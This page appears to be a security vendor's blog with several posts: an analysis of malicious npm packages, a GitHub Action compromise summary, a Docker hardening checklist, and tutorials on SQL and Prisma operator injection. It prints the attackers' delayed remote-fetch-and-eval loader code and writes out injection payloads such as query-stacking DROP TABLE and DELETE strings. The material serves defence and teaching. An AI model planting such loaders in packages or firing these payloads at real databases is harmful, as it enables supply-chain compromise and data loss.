Welcome to our blog.

Hide and Fail: Obfuscated Malware, Empty Payloads, and npm Shenanigans
On March 14th 2025, we detected a malicious package on npm called node-facebook-messenger-api
. At first, it seemed to be pretty run-of-the-mill malware, though we couldn’t tell what the end-goal was. We didn’t think much more of it until April 3rd 2025, when we see the same threat actor expand their attack. This is a brief overview of the techniques used by this specific attacker, and some fun observations about how their attempts at obfuscation actually ends up making them be even more obvious.
TLDR
node-facebook-messenger-api@4.1.0
, disguised as a legit Facebook messenger wrapper.axios
and eval()
to pull a payload from a Google Docs link — but the file was empty.zx
library to avoid detection, embedding malicious logic that triggers days after publish.node-smtp-mailer@6.10.0
, impersonating nodemailer
, with the same C2 logic and obfuscation.hyper-types
), revealing a clear signature pattern linking the attacks.
First steps
It all started on March 14th at 04:37 UTC, when our systems alerted us to a suspicious package. It was published by the user victor.ben0825
, which also claims to have the name perusworld
. This is the username of the user who owns the legitimate repository for this library.

Here’s the code it detected as being malicious in node-facebook-messenger-api@4.1.0:
, in the file messenger.js
, line 157-177:
const axios = require('axios');
const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2';
async function downloadFile(url) {
try {
const response = await axios.get(url, {
responseType: 'arraybuffer'
});
const fileBuffer = Buffer.from(response.data);
eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
return fileBuffer;
} catch (error) {
console.error('Download failed:', error.message);
}
}
downloadFile(url);
The attacker has tried to hide this code within a 769 line long file, which is a big class. Here they’ve added a function, and are calling it directly. Very cute, but very obvious too. We attempted to fetch the payload, but it was empty. We flagged it as malware and moved on.
A few minutes later, the attacker pushed another version, 4.1.1. The only change appeared to be in the README.md
and package.json
files, where they changed the version, description, and installation instructions. Because we mark the author as a bad author, packages from this point on were automatically flagged as malware.
Trying to be sneaky
Then on March 20th 2025 at 16:29 UTC, our system automatically flagged version 4.1.2
of the package. Let's look at what was new there. The first change is in node-facebook-messenger-api.js,
which contains:
"use strict";
module.exports = {
messenger: function () {
return require('./messenger');
},
accountlinkHandler: function () {
return require('./account-link-handler');
},
webhookHandler: function () {
return require('./webhook-handler');
}
};
var messengerapi = require('./messenger');
The change to this file is the last line. It’s not just importing the messenger.js
file when requested, it’s now always done when the module is imported. Clever! The other change is to that file, messenger.js.
It has removed the previously seen added code, and added the following on line 197 to 219:
const timePublish = "2025-03-24 23:59:25";
const now = new Date();
const pbTime = new Date(timePublish);
const delay = pbTime - now;
if (delay <= 0) {
async function setProfile(ft) {
try {
const mod = await import('zx');
mod.$.verbose = false;
const res = await mod.fetch(ft, {redirect: 'follow'});
const fileBuffer = await res.arrayBuffer();
const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
const nfu = new Function("rqr", data);
nfu(require)();
} catch (error) {
//console.error('err:', error.message);
}
}
const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2';
setProfile(gd);
}
Here’s an overview of what it does:
- It utilizes a time-based check for whether to activate the malicious code. It would only activate about 4 days later.
- Instead of using
axios
, it now uses Googlezx
library to fetch the malicious payload. - It disables verbose mode, which is also the default.
- It then fetches the malicious code
- It base64 decodes it
- It creates a new Function using the
Function()
constructor, which is effectively equviilant to aeval()
call. - It then calls the function, passing in
require
as an argument.
But again, when we try to fetch the file, we don’t get a payload. We just get an empty filed called info.txt.
The use of zx
is curious. We looked at the dependencies, and noticed that the original package contained a few dependencies:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"merge": "^2.1.1",
"request": "^2.81.0"
}
And the malicious package contains the following:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"hyper-types": "^0.0.2",
"merge": "^2.1.1",
"request": "^2.81.0"
}
Look at that, they added the dependency hyper-types. Very interesting, we will return to this a few times more.
They strike again!
Then on April 3rd 2025 at 06:46, a new package was released by the user cristr.
They released th epackage
node-smtp-mailer@6.10.0.
Our systems automatically flagged it due to containing potentially malicious code. We looked at it, and we got a bit excited. The package pretends to be nodemailer,
just with a different name.

Our system flagged the file lib/smtp-pool/index.js.
We quickly see that the attacker has added code at the bottom of the legitimate file, right before the final module.exports
. Here is what is added:
const timePublish = "2025-04-07 15:30:00";
const now = new Date();
const pbTime = new Date(timePublish);
const delay = pbTime - now;
if (delay <= 0) {
async function SMTPConfig(conf) {
try {
const mod = await import('zx');
mod.$.verbose = false;
const res = await mod.fetch(conf, {redirect: 'follow'});
const fileBuffer = await res.arrayBuffer();
const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
const nfu = new Function("rqr", data);
nfu(require)();
} catch (error) {
console.error('err:', error.message);
}
}
const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR';
SMTPConfig(url);
}
We know this code! It’s again timestamped to only execute 4 days later. We excitedly try to fetch the payload, but we just receive an empty file called beginner.txt.
Booo! We look at the dependencies again, to see how they are pulling in zx
. We noted that the legitimate nodemailer
package has no direct dependencies
, only devDependencies
. But here’s what is in the malicious package:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"hyper-types": "^0.0.2",
"merge": "^2.1.1",
"request": "^2.81.0"
}
Do you see a similarity between this, and the first package we detected? It’s the same dependency list. The legitimate package has no dependencies, but the malicious one does. The attacker simply copied the full list of dependencies from the first attack to this one.
Interesting dependencies
So why did they switch from using axios
to zx
for making HTTP
requests? Definitely for avoiding detection. But what’s interesting is that zx
isn’t a direct dependency. Instead, the attacker has included hyper-types, which is a legitimate package by the developer lukasbach.

Besides the fact that the referenced repository doesn’t exist anymore, there’s something interesting to note here. See how there’s 2 dependents
? Guess who those are.

If the attacker had actually wanted to try to obfuscate their activity, it’s pretty dumb to depend on a package that they are the only depenendents on.
Final words
While the attacker behind these npm packages ultimately failed to deliver a working payload, their campaign highlights the ongoing evolution of supply chain threats targeting the JavaScript ecosystem. The use of delayed execution, indirect imports, and dependency hijacking shows a growing awareness of detection mechanisms—and a willingness to experiment. But it also shows how sloppy operational security and repeated patterns can still give them away. As defenders, it's a reminder that even failed attacks are valuable intelligence. Every artifact, obfuscation trick, and reused dependency helps us build better detection and attribution capabilities. And most importantly, it reinforces why continuous monitoring and automated flagging of public package registries is no longer optional—it's critical.

Get the TL;DR: tj-actions/changed-files Supply Chain Attack
Let’s get into the tj-actions/changed-files supply chain attack. Read on for TL;DR, what you should do, what happened, and further information.
TL;DR
- The tj-actions/changed-files
GitHub Action, which is currently used in over 23,000 repositories, has been compromised, leaking secrets through workflow logs and impacting thousands of CI pipelines.
- All tagged versions were modified, making tag-based pinning unsafe. Public repositories are at the highest risk, but private repos should also verify their exposure.
- Immediate steps include identifying affected workflows, removing all references to the compromised action, rotating secrets, and checking logs for suspicious activity.
Aikido’s response: We released a new SAST rule that flags any usage with critical severity (Score 100). Aikido can automatically pin your Github actions to prevent this kind of exploit in the future.
First off, what should you do?
Check if you are affected by the j-actions/changed-files
supply chain attack:
A) Search for tj-actions
in your codebase
B) Use this Github query to find references to the affected GitHub action in your organization's repositories (replace [your-org] with the name of your organization).
Stop using tj-actions/changed-files
as soon as possible and remove all references to the compromised action.
Rotate the secrets of the affected pipelines and check logs of your (3rd party) services for suspicious use of the exposed tokens; focus on repos with publicly accessible CI runner logs first.
Let’s get into the attack: What happened?
A security incident involving the tj-actions/changed-files
GitHub Action was identified in mid-March 2025. Attackers introduced malicious code that exposed CI/CD secrets via workflow logs. First reported by Step Security, the incident has been assigned CVE-2025-30066.
While there remains a lack of clarity about what happened and how the code got pushed, most reports indicate that the attacker compromised a GitHub Personal Access Token (PAT) linked to the tj-actions-bot account, which allowed the attacker to make unauthorized modifications, inject malicious code, and manipulate version tags.
Timeline of events:
Before March 14, 2025: The malicious code began impacting affected repositories, causing secrets to leak into public logs.
March 14, 2025: Security researchers identified the compromise and raised awareness.
March 15, 2025: The malicious script hosted on GitHub Gist was removed. The compromised repository was briefly taken offline to revert the malicious changes and later restored without the harmful commits.
March 15, 2025: The repo is back online with a statement on the attack; the maintainer has also commented on the attack.
While the immediate threat has been addressed, cached versions of the compromised action could still pose a risk. Proactive mitigation is necessary to secure sensitive credentials.
What is the impact of the tj-actions/changed-files attack?
Repositories using popular tj-actions/changed-files
, especially public ones, risk leaking the secrets used in their pipelies. These secrets were exposed in workflow logs by the threat actor's malicious code. Although no confirmed external data exfiltration occurred, logs of public repositories could be accessed by malicious actors. Private repositories are less affected but should still assess their exposure, and rotate secrets if affected.
Public Repositories: High risk due to public exposure of workflow logs containing secrets.
Private Repositories: Lower risk, but having active secrets exposed in your workflow logs is still a significant risk.
Cached Action Users: Workflows that cached the compromised action may continue to be at risk until caches are purged.
How can Aikido help?
We released a new SAST rule that flags any tj-actions/changed-files
usage with critical severity (Score 100). If you already use Aikido, you're covered. If you do not have an Aikido account, you can connect and scan your setup in a few seconds.
Beyond this attack, Aikido also automatically pins your Github actions to prevent this kind of exploit in the future.
And our proprietary malware threat feed - Aikido Intel - detects malware within 3 minutes after release on npm, pypi, and will be extended to Github actions soon.
We make it easy to your software supply chain, and provide you the earliest warning for new risks and attacks.
Learn more about the attack:
- A breakdown on “Understanding and Re-Creating the tj-actions/changed-files Supply Chain Attack” by Latio Analyst, James Berthoty. James also shows you how to re-create the attack in your own environment to test your sensor (be careful).
- Step Security, who first reported the attack, published an investigation analysis, “Harden-Runner detection: tj-actions/changed-files action is compromised”
- View CVE-2023-51664

A no-BS Docker security checklist for the vulnerability-minded developer
Why are you here?
You want to know the real answer to two questions about Docker security:
Is Docker secure for production use?
Yes and no. Docker uses a security model that relies on namespaces and resource isolation, making the processes within more secure from specific attacks than running your applications directly from a cloud VM or bare metal system.Despite that layer, there are still plenty of ways for attackers to access your container, allowing them to read confidential information, run denial-of-service (DoS) attacks, or even gain root access to the host system.
How can I improve my Docker security (in a not terribly painful way)?
We’ll walk you through the most common and severe Docker vulnerabilities, skipping over the basic recommendations you’ll find all over Google, like using official images and keeping your host up to date.Instead, we’ll lead you directly to new docker options and Dockerfile lines that will make your new default Docker container deployment far more secure than ever.

The no-BS Docker security checklist
Make in-container filesystems read-only
What do you gain?
You prevent an attacker from editing the runtime environment of your Docker container, which could allow them to collect useful information about your infrastructure, gather user data, or conduct a DOS or ransomware attack directly.
How do you set it?
You have two options, either at runtime or within your Docker Compose configuration.
At runtime: docker run --read-only your-app:v1.0.1
In your Docker Compose file:
services:
webapp:
image: your-app:v1.0.1read_only: true
...
Lock privilege escalation
What do you gain?
You keep your Docker container—or an attacker who is mucking about inside said container—from enabling new privileges, even root-level, with setuid or setgid. With more permissive access to your container, an attacker could access credentials in the form of passwords or keys to connected parts of your deployment, like a database.
How do you set it?
Once again, at runtime or within your Docker Compose configuration.
At runtime: docker run --security-opt=no-new-privileges your-app:v1.0.1
In your Docker Compose file:
services:
webapp:
image: your-app:v1.0.1
security_opt:
- no-new-privileges:true
...
Isolate your container-to-container networks
What do you gain?
By default, Docker lets all containers communicate via the docker0 network, which might allow an attacker to move laterally from one compromised container to another. If you have discrete services A
and B
in containers Y
and Z
, and they don’t need to communicate directly, isolating their networks provides the same end-user experience while preventing lateral movement for better Docker security.
How do you set it?
You can specify Docker networks at runtime or within your Docker Compose configuration. However, you first need to create the network:
docker network create your-isolated-network
At runtime, add the --network optio
n: docker run --network your-isolated-network your-app:v1.0.1
Or the equivalent option in your Docker Compose file:
services:
webapp:
image: your-app:v1.0.1
networks:
- your-isolated-network
...
Set a proper non-root user
What do you gain?
The default user within a container is root
, with a uid of 0
. By specifying a distinct user, you prevent an attacker from escalating their privileges to another user that can take action without restrictions, like root, which would override any other Docker security measures you’ve worked hard to implement.
How do you set it?
Create your user during the build process or a runtime. At runtime, you can either create the user for the first time, or override the USER
you already set at build.
During the build process, in your Dockerfile
:
...
RUN groupadd -r your-user
RUN useradd -r -g your-user your-user
USER myuser
...
At runtime: docker run -u your-user your-app:v1.0.1
Drop Linux kernel capabilities
What do you gain?
By default, Docker containers are allowed to use a restricted set of Linux kernel capabilities. You might think the folks at Docker created that restricted set to be completely secure, but many capabilities exist for compatibility and simplicity. For example, default containers can arbitrarily change ownership on files, change their root directory, manipulate process UIDs, and read sockets. By dropping some or all of these capabilities, you minimize the number of attack vectors.
How do you set it?
You can drop capabilities and set new ones at runtime. For example, you could drop all kernel capabilities and allow your container only the capability to change ownership of existing files.
docker run --cap-drop ALL --cap-add CHOWN your-app:v1.0.1
Or for Docker Compose:
services:
webapp:
image: your-app:v1.0.1
cap_drop:
- ALL
cap_add:
- CHOWN
...
Prevent fork bombs
What do you gain?
Fork bombs are a type of DoS attack that infinitely replicates an existing process. First, they reduce performance and restrict resources, which inevitably raises costs and can ultimately crash your containers or the host system. Once a fork bomb has started, there’s no way to stop it other than restarting the container or the host.
How do you set it?
At runtime, you can limit the number of processes (PIDs) your container can create.
docker run --pids-limit 99 your-app:v1.0.1
Or with Docker Compose:
services:
webapp:
image: your-app:v1.0.1
deploy
limits:
pids: 99
Improve Docker security by monitoring your open source dependencies
What do you gain?
The applications you’ve containerized for deployment with Docker likely have a wide tree of dependencies.
How do you set it?
The most “non-BS” way is with Aikido’s open-source dependency scanning. Our continuous monitoring scans projects written in more than a dozen languages based on the presence of lockfiles within your application and delivers an instant overview of vulnerabilities and malware. With automatic triaging that filters out false positives, Aikido gives you remediation advice you can start working with right away… not only after you read a dozen other reference documents and GitHub issues.
At Aikido, we love established open-source projects like Trivy, Syft, and Grype. We also know from experience that using them in isolation isn’t a particularly good developer experience. Under the hood, Aikido enhances these projects with custom rules to bridge gaps and reveal security flaws you wouldn’t be able to find otherwise. Unlike chaining various open-source tools together, Aikido frees you from having to build a scanning script or create a custom job in your CI/CD.

Use only trusted images for Docker security
What do you gain?
Docker Content Trust (DCT) is a system for signing and validating the content and integrity of the official images you pull from Docker registries like Docker Hub. Pulling only images signed by the author gives you more reassurance they haven’t been tampered with to create vulnerabilities in your deployment.
How do you set it?
The easiest way is to set the environment variable on your shell, which prevents you or anyone else from working with untrusted images.
export DOCKER_CONTENT_TRUST=1
docker run ...
Or, you can set the environment variable each time you execute Docker:
DOCKER_CONTENT_TRUST=1 docker run …
Update end-of-life (EOL) runtimes
What do you gain?
One common recommendation for Docker container security is to pin images and dependencies to a specific version instead of latest
. In theory, that prevents you from unknowingly using new images, even ones that have been tampered with, that introduce new vulnerabilities.
How do you set it?
You have some open-source projects available to help you discover EOLs and best prepare. The endoflife.date project (GitHub repository) tracks more than 300 products by aggregating data from multiple sources and making it available via a public API. You have a few options with endoflife.date and similar projects:
- Manually check the project for updates on dependencies your applications rely on and create tickets or issues for required updates.
- Write a script (Bash, Python, etc.) to get the EOL dates of dependencies from the API and run it regularly, like a cron job.
- Incorporate the public API, or that custom script, into your CI platform to fail builds that use a project that’s nearing or reached EOL.
As a developer, we understand that your time is valuable and often limited. This is where Aikido can provide a sense of security—our EOL scanning feature tracks your code and containers, prioritizing runtimes with the most impact and exposure, like Node.js or an Nginx web server. As usual, we not only automate collecting information, but deliver alerts with appropriate severity to inform, not overwhelm you.

Limit container resource usage
What do you gain?
By default, containers have no resource constraints and will use as much memory or CPU as the host’s scheduler. Limiting the resource usage of a specific container can minimize the impact of a DoS attack. Instead of crashing your container or host system due to an Out of Memory Exception, the ongoing DoS attack will “only” negatively impact the end-user experience.
How do you set it?
At runtime, you can use the --memory
and --cpus
option to set limits for memory and CPU usage, respectively. The memory option takes numbers with g for gigabytes and m for megabytes, while the CPU option reflects the limit of dedicated CPUs available for the container and its processes.
docker run --memory="1g" --cpus="2" your-app:v1.0.1
This also works with Docker Compose:
services:
webapp:
image: your-app:v1.0.1
deploy:
limits:
cpus: '2'
memory: 1G
...
Your final command and Compose options for Docker security
By now you’ve seen quite a few Docker security tips and the relevant CLI options or configuration to go along with them, which means you’re either quite excited to implement them or overwhelmed with how to piece them all together. Below, we’ve rolled up all the recommendations into a single command or configuration template, which will help you start deploying more secure Docker containers right away.
Obviously, you’ll want to change some of the options—like the non-root user name, kernel capabilities, resource limits—based on your application’s needs.
export DOCKER_CONTENT_TRUST=1
docker run \
--read-only \
--security-opt=no-new-privileges \
--network your-isolated-network \
--cap-drop ALL
--cap-add CHOWN \
--pids-limit 99 \
--memory="1g" --cpus="2" \
--user=your-user \
... # OTHER OPTIONS GO HERE
your-app:v1.0.1
You might even want to create a drun alias with your host’s shell you can invoke without having to remember all those details.
function drun {
docker run \
--read-only \
--security-opt=no-new-privileges \
--network your-isolated-network \
--cap-drop ALL
--cap-add CHOWN \
--pids-limit 99 \
--memory="1g" --cpus="2" \
--user=your-user \
$1 \
$2
}
Then run your alias like so, with your options and image name: drun -it your-app:v1.0.1
If you’re a Docker Compose kind of person, you can adapt all the same options into a new baseline Docker Compose template you can work from in the future:
services:
webapp:
image: your-app:v1.0.1
read_only: true
security_opt:
- no-new-privileges:true
networks:
- your-isolated-network
cap_drop:
- ALL
cap_add:
- CHOWN
deploy:
limits:
pids: 9
cpus: '2'
memory: 1G
... # OTHER OPTIONS GO HERE
Bonus: Run Docker with rootless containers
When you install Docker on any system, its daemon operates with root-level privileges. Even if you enable all the options above, and prevent privilege escalation within a Docker container, the rest of the container runtime on your host system still has root privileges. That inevitably widens your attack surface.
The solution is rootless containers, which an unprivileged user can create and manage. No root privileges involved means far fewer security issues for your host system.
We wish we could help you use rootless containers with a single option or command, but it’s just not that simple. You can find detailed instructions at the Rootless Containers website, including a how-to guide for Docker.
What’s next for your Docker security?
If you’ve learned anything from this experience, it’s that container security is a long-tail operation. There are always more hardening checklists and deep-dive articles to read about locking down your containers in Docker or its older and often misunderstood cousin, Kubernetes. You can’t possibly aim for faultless container security—creating time in your busy development schedule to address security, and then making incremental improvements based on impact and severity, will go a long way over time.
To help you maximize on that continuous process and prioritize fixes that will meaningfully improve your application security, there’s Aikido. We just raised a $17 million Series A for our “no BS” developer security platform, and we’d love to have you join us.

Sensing and blocking JavaScript SQL injection attacks
Why are you here?
You’ve heard about JavaScript SQL injection attacks before, but you’re not entirely sure what they look like in the wild or if you need to worry about them in the first place. Maybe you’re trying to figure out just how bad it could be.
In short, if you’re building apps using SQL databases, like MySQL and PostgreSQL, you’re at risk—you’re not safe from attack methods plaguing developers and their databases for decades. As a developer, the onus is on you to implement guardrails that protect user data and ensure your underlying infrastructure is never intruded, explored, or commandeered.
All the new tools say they’re helping you, but they just make development more complex.
You can add an object–relational mapper (ORM) like Sequelize and TypeORM to simplify how you work with SQL databases like MySQL and PostgreSQL, but they don’t completely absolve you of risk. Web application firewalls (WAFs) help you block attacks at the networking level, but require expensive infrastructure and constant maintenance. Code-scanners can help you identify obvious flaws, but do far less for the unknown unknowns and lurking zero-day techniques.
We’ll present you with a clear picture of what SQL injection attacks look like, the risk they carry, and the development mistakes that make them possible. Then we’ll do you one better by walking you through installing a global hotfix so you’ll know, with certainty, that your apps are safe.
SQL injection attacks: examples and implications
The most basic definition of an SQL injection attack is when an app allows unvalidated and unsanitized user input to run database queries, allowing an attacker to read the SQL database, modify records, or delete to their heart’s content.
As usual, XKCD illustrates the danger of SQL better than most gloomy scenarios we could dream up:

What does vulnerable JavaScript app look like?
Let’s start with a simple pseudocode example: a JavaScript app with an input element that allows users to search a database of cats. In the example JavaScript code below, the app responds to POST requests on the /cats path to extract the user input from the request body and connects to the database with a query to return all cats with a matching id. The app then displays the cat using the JSON response.
app.post("/cats", (request, response) => {
const query = `SELECT * FROM cats WHERE id = ${request.body.id}`;
connection.query(query, (err, rows) => {
if(err) throw err;
response.json({
data: rows
});
});
});
While this example might look innocuous to those untrained on SQL injection attacks, it’s egregiously vulnerable. Notably, the app does not attempt to validate or sanitize user input for potentially dangerous strings or encoding methods, and concatenates user input directly into the SQL query, which allows attackers multiple opportunities to attack using common SQL injection attack methods that have existed for decades.
Example JavaScript SQL attack payloads
SQL injection hinges on tricking your MySQL or PostgreSQL database into taking action or responding with data outside the expected scope due to how your app generates SQL queries.
The 1=1 is always true attack can return the entire table of cats with tricks like apostrophes or quotation marks, because 1=1
is indeed always TRUE:
- The user inputs:
BOBBY TABLES’ OR 1=’1
- The database executes the SQL query:
SELECT * FROM Users WHERE Cat = BOBBY TABLES OR 1=1;
Similarly, attackers can exploit a = is always true attack to return all cats, because ""=""
is always TRUE:
- The user inputs:
" OR ""="
- The database executes the SQL query:
SELECT * FROM Cats WHERE CatId ="" or ""="";
Attackers will often exploit how databases handle inline comments, and by inserting comments (/* … */)
into a query, they can obfuscate their intent or bypass filters.
- The user inputs:
DR/*hello world*/OP/*sneak attack*/ TABLE Cats;
- The database executes the SQL query:
DROP TABLE Cats;
Another common JavaScript SQL injection strategy is query stacking, which lets attackers start with an innocuous string, then use a semicolon (;) to terminate that statement and begin another containing their injection. Attackers often use query stacking to delete entire databases in one fell swoop with a DROP TABLE command:
- The user inputs:
Bobby; DROP TABLE Cats --
- The app builds its SQL query:
const query = "SELECT * FROM Cats WHERE CatId = " + input;
- The database executes the SQL query:
SELECT * FROM Cats WHERE CatId = BOBBY; DROP TABLE Cats;
What about NoSQL injection attacks?
NoSQL injection attacks are equally dangerous to the security of your app and user data, but only affect tech stacks using databases like MongoDB. The main difference is the style attacks, as SQL and NoSQL queries use entirely unique syntax that doesn’t translate from one category to the other.
If you’re using a SQL database, you’re not at risk of NoSQL injection attacks, and vice versa.
The basic path: manually fixing all your SQL injection vulnerabilities
At this point, you might be less interested in what all the possible injection tricks look like and more interested in how to protect the data you have in MySQL or PostgreSQL.
- Use parameterized queries: SQL has functionality to disconnect the execution of queries and values, protecting the database from injection attacks.With the JavaScript/Node.js example from above, you can employ a placeholder in your SQL query with a question mark (
?
). Theconnection.query()
method then takes the parameter in its second argument, providing the same results in an injection-proof method.
app.post("/cats", (request, response) => {
const query = `SELECT * FROM Cats WHERE id = ?`;
const value = request.body.id;
connection.query(query, value, (err, rows) => {
if(err) throw err;
response.json({
data: rows
});
});
});
- Validate and sanitize user input: While parameterized queries can help protect your SQL database from intrusion and attack, you can also prevent users from entering potentially dangerous strings into your application.
One option is adding open-source libraries for sanitization and validation to your app. For example, you can use validator.js in the JavaScript/Node.js ecosystem to double-check that a user is trying to enter a real email address—not an SQL injection attack—into your sign-up form.
You can also develop custom regex-based validators to perform similar work, but you’ll have an enormously time-consuming and complex road ahead with research and tons of manual testing. Plus, can you really interpret this example regex for email validation?const re = /^(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
The same idea applies to preventing strings like…’ OR 1-’1.
You can try to research and close down all these opportunities yourself, but you’d probably rather spend your time building new features.
- Deploy WAFs or agent-based security platforms: While these solutions can block SQL attacks before they even touch your app, or at least notify you in real-time as attacks happen, they come with some caveats.
First, they are often expensive and require you to launch new infrastructure on-premises or in the cloud, which is often far more complex than what you signed up for as a developer who just wants to ship to production. Second, they require more manual maintenance to update the ruleset, distracting you from other manual interventions to SQL injection. Finally, they often add more computational load, or redirect all requests through their platform for analysis, adding latency and harming the end-user experience.
The big problem is that opportunities for SQL injection attacks are like weeds—you can cut them all down once using these tools, but you must be constantly vigilant over your entire codebase to ensure they never sprout again.
An alternative path to solving JavaScript SQL injection attacks: Aikido Firewall
Aikido Security recently released Firewall, a free and open-source security engine that autonomously projects you from SQL injection attacks—and a whole lot more.
If you’re not using Node.js, just know that we’ll start supporting other languages and frameworks in the future. You can always subscribe to our product newsletter to hear exactly when Firewall expands beyond the JavaScript world or email us at hello@aikido.dev if you’d like to pitch a specific language.
Testing an app that’s vulnerable to JavaScipt SQL injection
Let’s use a sample app that ships with the open-source repository to showcase how Aikido Firewall works. You’ll also need Docker/Docker Compose to deploy a local MySQL database.
Start by forking the firewall-node repository and cloning said fork to your local workstation.
git clone https://github.com/<YOUR-GITHUB-USERNAME>/firewall-node.gitcd firewall-node
Use Docker to deploy a local MySQL database on port 27015. This docker-compose.yml file also creates s3mock, MongoDB, and PostgreSQL containers as well, as it was created to help the Aikido team test how Firewall blocks various attacks.
docker-compose -f sample-apps/docker-compose.yml up -d
Next, launch the sample app:
node sample-apps/express-mysql2/app.js
Open http://localhost:4000
in your browser to check out the very simple cat app. In the textarea, type in a few cat names and click the Add button. To test SQL injection, you can either click the Test injection link or type the following into the textarea: Kitty'); DELETE FROM cats;-- H
and click Add again. Either way, the app allows you to stack multiple queries together using some sneaky query comments, deleting the entire cats database.
How does this happen? As we warned against earlier, this app simply tacks on any user input at the end of the SQL query, which is inherently unsafe.
const query = `INSERT INTO cats(petname) VALUES ('${name}');`
The consequences might be small here, but it’s not hard to imagine how this oftentimes honest mistake can have disastrous consequences for your production app.
Blocking JavaScript SQL injection with Aikido Firewall
Now let’s look at how quickly our open-source security engine blocks JavaScript SQL injection attacks without manually fixing every database interaction in your code.
If you don’t yet have an Aikido account, go ahead and make one for free. If you already have one, log in and connect your GitHub account. During that process, grant Aikido access to read your fork of the firewall-node
project.
Go to the Firewall dashboard and click Add Service. Give your service a name and once again choose your fork for the firewall-node
project.

Aikido then instructs you on how to install and implement Aikido Firewall. Since we’re using the example app, that work is already done for you, but it’s a helpful reference for how you’d go about bringing our open-source security engine to all your Node.js apps that might be vulnerable to JavaScript SQL injection attacks.

Click the Generate Token button to create a token to let Aikido Firewall securely pass information about blocked SQL injection attacks to the Aikido security platform. Copy the generated token, which starts with AIK_RUNTIME…
, and head back to your terminal to rerun the sample app, only now with Firewall fully enabled in blocking mode:
AIKIDO_TOKEN=<YOUR-AIKIDO-TOKEN> AIKIDO_DEBUG=true AIKIDO_BLOCKING=true node sample-apps/express-mysql2/app.js
Open localhost:4000
and once again invoke the included SQL injection attack. This time, Aikido will block you at the browser, output to your local web server’s logs, and generate a new event. Click that to see comprehensive details about the SQL injection attempt, including the payload and where your app generated the dangerous SQL query.

Instead of worrying about forever protecting your apps against JavaScript SQL injection attacks, both critical and not-yet-seen, Aikido Firewall offers comprehensive blocking and sophisticated observability that keeps you informed about attack sources, common payloads, and potential weak points.
What’s next?
You can install and implement Aikido Firewall in all your Node.js-based applications for free. Our open-source embedded security engine protects your infrastructure and user data against JavaScript SQL injection attacks, command injection, prototype pollution, path traversal, and more to come shortly.
We’re not saying Firewall should replace development best practices for protecting against SQL injection, like using parameterized queries or never trusting user input, but we also know from personal experience that no developer is perfect. No codebase is faultless, and honest mistakes happen all the time.
Think of Firewall as a global hotfix for SQL injection. Unlike custom-developed regex, latency-inducing WAFs, or complex security agents that cost a pretty penny, It does this one job extraordinarily well and with negligible impact—entirely for free.
If you like what you’ve seen, check out our roadmap and give our GitHub repository (https://github.com/AikidoSec/firewall-node) a star. ⭐

Prisma and PostgreSQL vulnerable to NoSQL injection? A surprising security risk explained
Introduction
Imagine you’re building a blogging web app using Prisma. You write a simple query to authenticate users based on their provided email and password:
1const user = await prisma.user.findFirst({
2 where: { email, password },
3});
Looks harmless, right? But what if an attacker sends password = { "not": "" }
? Instead of returning the User object only when email and password match, the query always returns the User when only the provided email matches.
This vulnerability is known as operator injection, but it’s more commonly referred to as NoSQL injection. What many developers don’t realize is that despite strict model schemas some ORMs are vulnerable to operator injection even when they’re used with a relational database such as PostgreSQL, making it a more widespread risk than expected.
In this post, we’ll explore how operator injection works, demonstrate exploits in Prisma ORM, and discuss how to prevent them.
Understanding Operator Injection
To understand operator injection in ORMs, it’s interesting to first look at NoSQL injection. MongoDB introduced developers to an API for querying data using operators such as $eq
, $lt
and $ne
. When user input is passed blindly to MongoDB's query functions, there exists a risk of NoSQL injection.
Popular ORM libraries for JavaScript started offering a similar API for querying data and now almost all major ORMs support some variation of query operators, even when they don’t support MongoDB. Prisma, Sequelize and TypeORM have all implemented support for query operators for relational databases such as PostgreSQL.
Exploiting Operator Injection in Prisma
Prisma query functions that operate on more than one record typically support query operators and are vulnerable to injection. Example functions include findFirst
, findMany
, updateMany
and deleteMany
. While Prisma does validate the model fields referenced in the query at runtime, operators are a valid input for these functions and therefor aren’t rejected by validation.
One reason why operator injection is easy to exploit in Prisma, is the string-based operators that are offered by the Prisma API. Some ORM libraries have removed support for string-based query operators because they are so easily overlooked by developers and easy to exploit. Instead, they force developers to reference custom objects for operators. As these objects cannot be readily de-serialized from user input, the risk of operation injection is greatly reduced in these libraries.
Not all query functions in Prisma are vulnerable to operator injection. Functions that select or mutate a single database record typically do not support operators and throw a runtime error when an Object is provided. Apart from findUnique, the Prisma update, delete and upsert functions also do not accept operators in their where filter.
1 // This query throws a runtime error:
2 // Argument `email`: Invalid value provided. Expected String, provided Object.
3 const user = await prisma.user.findUnique({
4 where: { email: { not: "" } },
5 });
Best Practices to Prevent Operator Injection
1. Cast User Input to Primitive Data Types
Typically casting input to primitive data types such as strings or numbers suffices to prevent attackers from injecting objects. In the original example, casting would look as follows:
1 const user = await prisma.user.findFirst({
2 where: { email: email.toString(), password: password.toString() },
3 });
2. Validate User Input
While casting is effective, you might want to validate the user input, to ensure that the input meets your business logic requirements.
There are many libraries for server-side validation of user input, such as class-validator, zod and joi. If you’re developing for a web application framework such as NestJS or NextJS, they likely recommend specific methods for user input validation in the controller.
In the original example, zod validation might look as follows:
1import { z } from "zod";
2
3const authInputSchema = z.object({
4 email: z.string().email(),
5 password: z.string().min(8)
6});
7
8const { email, password } = authInputSchema.parse({email: req.params.email, password: req.params.password});
9
10const user = await prisma.user.findFirst({
11 where: { email, password },
12});
3. Keep your ORM updated
Stay updated to benefit from security improvements and fixes. For example, Sequelize disabled string aliases for query operators starting from version 4.12, which significantly reduces susceptibility to operator injection.
Conclusion
